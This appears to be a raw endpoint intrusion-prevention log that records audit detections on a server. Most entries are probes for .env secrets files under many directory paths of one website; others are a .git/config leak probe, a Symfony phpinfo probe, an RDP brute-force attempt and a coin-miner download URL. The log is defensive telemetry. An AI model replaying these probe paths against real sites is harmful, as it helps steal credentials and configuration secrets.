VyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000c5b1	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-content/themes/structure/images/logo.png			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
0000039f	01dc94861b6b6156	000000ce	0000000f	164a8367	77fced0f	00000002	00000002	00000001	01dc9485f4bbefd0	01dc9485f4bbefd0	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY0QjhGQ0YxLTk0ODUtMTFGMS1CQ0U5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c758	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://dogonhidinh.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000baf	01dc94863ca2fc2d	000000ce	0000000f	164a8367	2036bfa0	00000002	00000002	00000001	01dc948618902467	01dc948618902467	00000001	00000910	[SID: 32856] Audit: RDP Bruteforce Attempt 2 attack detected but not blocked. Application path: C:\PROGRAM FILES\MARIADB 10.5\BIN\MYSQLD.EXE		C:\PROGRAM FILES\MARIADB 10.5\BIN\MYSQLD.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXNcXE1hcmlhREIgMTAuNVxcYmluXFxteXNxbGQuZXhlXCIgXCItLWRlZmF1bHRzLWZpbGU9QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxEYXRhYmFzZXNcXE15U1FMXFxteS5pbmlcIiBNYXJpYURCMTA1IiwiZmlsZSI6eyJjcmVhdGVkIjoxNzQ1NTg0OTE0MDAwLCJmb2xkZXIiOiJjOlxccHJvZ3JhbSBmaWxlc1xcbWFyaWFkYiAxMC41XFxiaW5cXCIsIm1kNSI6IkQzQzlDN0U1RjY5NzlERjlGODczNjI2MzUzNDMwMEM0IiwibmFtZSI6Im15c3FsZC5leGUiLCJwYXRoIjoiYzpcXHByb2dyYW0gZmlsZXNcXG1hcmlhZGIgMTAuNVxcYmluXFxteXNxbGQuZXhlIiwic2hhMSI6IjIxRjYxMDVFQTMzNTZEQ0YyRkE1MjIyMUE0NkVDQ0I3ODYxNTE4ODEiLCJzaGEyIjoiMjZBMUNDMUQxRURCNzAwMzc1ODBCNUNDODVFQzFDRjU0MDBEREM1REQ3QTFFQTU2NEIyMEI4NzlFMjVEMTg4NiIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiMTAuNS4yOS4wIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ1MDAsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwMTk3NDk2OTQsInVpZCI6IjY1RjJGQjI1LTAwMEUtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE4OEZEM0Q0LTk0ODYtMTFGMS1BREYxLTAwMTU1RDA1NzgwQyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxzeXN0ZW0zMlxcc2VydmljZXMuZXhlIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNzQ0MTY0NzU2Nzg3LCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzdGVtMzJcXCIsIm1kNSI6IjgwN0I0NjgzRTM3OUY3MUI1OTVEMDY1RDFGOUMxREM4IiwibmFtZSI6InNlcnZpY2VzLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzdGVtMzJcXHNlcnZpY2VzLmV4ZSIsInByb2R1Y3RfbmFtZSI6Ik1pY3Jvc29mdMKuIFdpbmRvd3PCriBPcGVyYXRpbmcgU3lzdGVtIiwic2hhMSI6IjdGOTk1MUNBMkZBRDNFRTc1RjM5MDRBMDc4NzE0ODBBNzVGMDNBRDYiLCJzaGEyIjoiNjE0ODA3NTIxMjdDNDdFQTcxQTYxMjE3REQyRDQ2RkRBMTA0QjBCNDhBRjk5MDVERUQ2QzYwN0I5NDZEQTNEMSIsInNpZ25hdHVyZV9jb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJzaWduYXR1cmVfY3JlYXRlZF9kYXRlIjoxNzQzNTczODQwMDAwLCJzaWduYXR1cmVfaXNzdWVyIjoiTWljcm9zb2Z0IFdpbmRvd3MgUHJvZHVjdGlvbiBQQ0EgMjAxMSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUyMDc3MDEwMywic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzEsMiwzLDUsNiwxNiwxNywxOCwyMF0sInZlcnNpb24iOiIxMC4wLjIwMzQ4LjM0NTEiLCJ4YXR0cmlidXRlcyI6eyJwb3J0YWwiOmZhbHNlfX0sInBpZCI6MTEwNCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxOTczNzEyNSwidWlkIjoiNjVGMkY5RDItMDAwRS1GMUYxLUI5RUMtNjBBQkM1RUYxREQ0In0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzI4NTYsIm5hbWUiOiJBdWRpdDogUkRQIEJydXRlZm9yY2UgQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00008058	00010000	00000002	00000002	0000ffe0	00000cea	00000000000000000000000000000000	00000000000000000000000000000000	Audit: RDP Bruteforce Attempt 2				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		26A1CC1D1EDB70037580B5CC85EC1CF5400DDC5DD7A1EA564B20B879E25D1886	00000000	00000000	
00000215	01dc94876b1f2a36	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94874628ad39	01dc94874628ad39	00000001	00000000	Active Response that started at 2/3/2026 3:52:43 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003bb	01dc948789077b51	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc948764b6cd12	01dc948764b6cd12	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY0QjZCOTNCLTk0ODctMTFGMS05OTQxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008846	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc94878c5aa6b6	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc948767d5880b	01dc948767d5880b	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY3RDMxMjRGLTk0ODctMTFGMS05ODhGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008846	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/portal/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc948799a18d67	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487723e44bb	01dc948775c11e59	00000002	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc1QzExN0ZGLTk0ODctMTFGMS05RTY3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e500	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/new/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c5	01dc9487a047ea14	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc948779b8d1f4	01dc948779b8d1f4	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc5QjU5RjBELTk0ODctMTFGMS05MDEwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cfd8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/new/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003cc	01dc9487a047ea14	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94877ae076c2	01dc94877ae076c2	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdBREY4QUE2LTk0ODctMTFGMS05MDhELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000cfd8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://straumannvietnam.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9487a6e5fec2	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94877fdc0671	01dc94877fdc0671	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdGREI0Mjk0LTk0ODctMTFGMS05MkE0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008d90	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487a6e5fec2	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487812b041e	01dc9487812b041e	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjgxMjg3RTY1LTk0ODctMTFGMS05NTJGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008d98	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/conf/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487a6e5fec2	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487822ee5aa	01dc9487822ee5aa	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjgyMkUyMUNCLTk0ODctMTFGMS05NTlELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000087c4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/cron/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9487ad8c6621	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc948787ab4cfe	01dc948787ab4cfe	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijg3QTgyODM3LTk0ODctMTFGMS05N0VBLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000087c4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487b0df8f2b	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94878c5aa6b6	01dc94878c5aa6b6	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhDNTgzMDNFLTk0ODctMTFGMS04OUUxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cf7e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/main/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c8	01dc9487b432ba4f	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94878ea52c11	01dc94878ea52c11	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhFQTJCNjM3LTk0ODctMTFGMS04OEQ3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cf7e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/node_modules/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9487b432ba4f	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94878fa447e8	01dc94878fa447e8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhGQTQzNDA1LTk0ODctMTFGMS04QjQzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cf7e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/admin/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487b785249c	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487921d28a0	01dc948793aba5eb	00000002	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjkzQUFFNTQ2LTk0ODctMTFGMS04QUYzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000d584	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/prod/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9487bad85064	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879459b251	01dc94879459b251	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk0NTc1QTVFLTk0ODctMTFGMS04RDNCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000d584	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.bak			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9487be2b7b54	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879879e866	01dc94879879e866	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk4NzlDNDdGLTk0ODctMTFGMS04Q0Y3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000d588	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c7	01dc9487be2b7b54	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879990dd25	01dc94879990dd25	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk5OERBNjkwLTk0ODctMTFGMS04RjZCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ad40	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/development/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9487be2b7b54	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879a034e3b	01dc94879a034e3b	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlBMDI3QTUyLTk0ODctMTFGMS04RjlDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ad40	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/backend/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c6	01dc9487c17eac26	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879b55e3b0	01dc94879b55e3b0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlCNTMyQkE1LTk0ODctMTFGMS04RTI5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ad50	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/api/shared/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
